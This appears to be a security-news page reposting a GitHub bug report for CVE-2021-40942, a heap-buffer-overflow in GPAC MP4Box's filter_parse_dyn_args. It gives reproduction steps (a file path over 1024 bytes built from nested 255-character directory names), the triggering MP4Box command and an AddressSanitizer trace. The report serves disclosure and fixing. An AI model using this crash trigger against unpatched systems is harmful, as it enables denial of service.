Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-40942: heap-buffer-overflow in MP4Box at filter_core/filter.c:1454 · Issue #1908 · gpac/gpac

In GPAC MP4Box v1.1.0, there is a heap-buffer-overflow in the function filter_parse_dyn_args function in filter_core/filter.c:1454, as demonstrated by GPAC. This can cause a denial of service (DOS).

CVE
#dos#git#c++

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

  • I looked for a similar issue and couldn’t find any.
  • I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
  • I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line …)

Step to reproduce:

1.get latest commit code (GPAC version 1.1.0-DEV-rev1216-gb39aa09c0-master)
2.compile with --enable-sanitizer
3.make 5 dirs which every of them has a large name(length=255), this makes the file's abs-path lengh larger than 1024, we called it large.nhml
4.run MP4Box -add {path to large.nhml} -new new.mp4

Env:
Ubunut 20.04 , clang 12.0.1

My cmd line an ASAN report
MP4Box -add ~/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/large.nhml -new new.mp4

==2343764==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61a00000a7a1 at pc 0x7fb8ca3e675d bp 0x7ffd40a5e9d0 sp 0x7ffd40a5e9c8
WRITE of size 1 at 0x61a00000a7a1 thread T0
    #0 0x7fb8ca3e675c in filter_parse_dyn_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1454:13
    #1 0x7fb8ca3cf6dc in gf_filter_parse_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1726:2
    #2 0x7fb8ca3cdbe0 in gf_filter_new_finalize /home/lly/pro/gpac_public/src/filter_core/filter.c:418:2
    #3 0x7fb8ca3cc58a in gf_filter_new /home/lly/pro/gpac_public/src/filter_core/filter.c:382:7
    #4 0x7fb8ca3c3d27 in gf_fs_load_source_dest_internal /home/lly/pro/gpac_public/src/filter_core/filter_session.c:2845:12
    #5 0x7fb8ca3c47b0 in gf_fs_load_source /home/lly/pro/gpac_public/src/filter_core/filter_session.c:2885:9
    #6 0x7fb8c9f97e29 in gf_media_import /home/lly/pro/gpac_public/src/media_tools/media_import.c:1469:11
    #7 0x50522f in import_file /home/lly/pro/gpac_public/applications/mp4box/fileimport.c:1289:7
    #8 0x4e1a09 in do_add_cat /home/lly/pro/gpac_public/applications/mp4box/main.c:4257:10
    #9 0x4e79ca in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:5746:13
    #10 0x4ea7ca in main /home/lly/pro/gpac_public/applications/mp4box/main.c:6456:1
    #11 0x7fb8c92ba0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #12 0x429a8d in _start (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x429a8d)

0x61a00000a7a1 is located 0 bytes to the right of 1313-byte region [0x61a00000a280,0x61a00000a7a1)
allocated by thread T0 here:
    #0 0x4a4c69 in realloc (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x4a4c69)
    #1 0x7fb8ca3e529d in filter_parse_dyn_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1451:12
    #2 0x7fb8ca3cf6dc in gf_filter_parse_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1726:2
    #3 0x7fb8ca3cdbe0 in gf_filter_new_finalize /home/lly/pro/gpac_public/src/filter_core/filter.c:418:2

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/lly/pro/gpac_public/src/filter_core/filter.c:1454:13 in filter_parse_dyn_args
Shadow bytes around the buggy address:
  0x0c347fff94a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fff94b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fff94c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fff94d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fff94e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c347fff94f0: 00 00 00 00[01]fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fff9500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fff9510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fff9520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fff9530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fff9540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc

Related news

Gentoo Linux Security Advisory 202408-21

Gentoo Linux Security Advisory 202408-21 - Multiple vulnerabilities have been discovered in GPAC, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 2.2.0 are affected.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907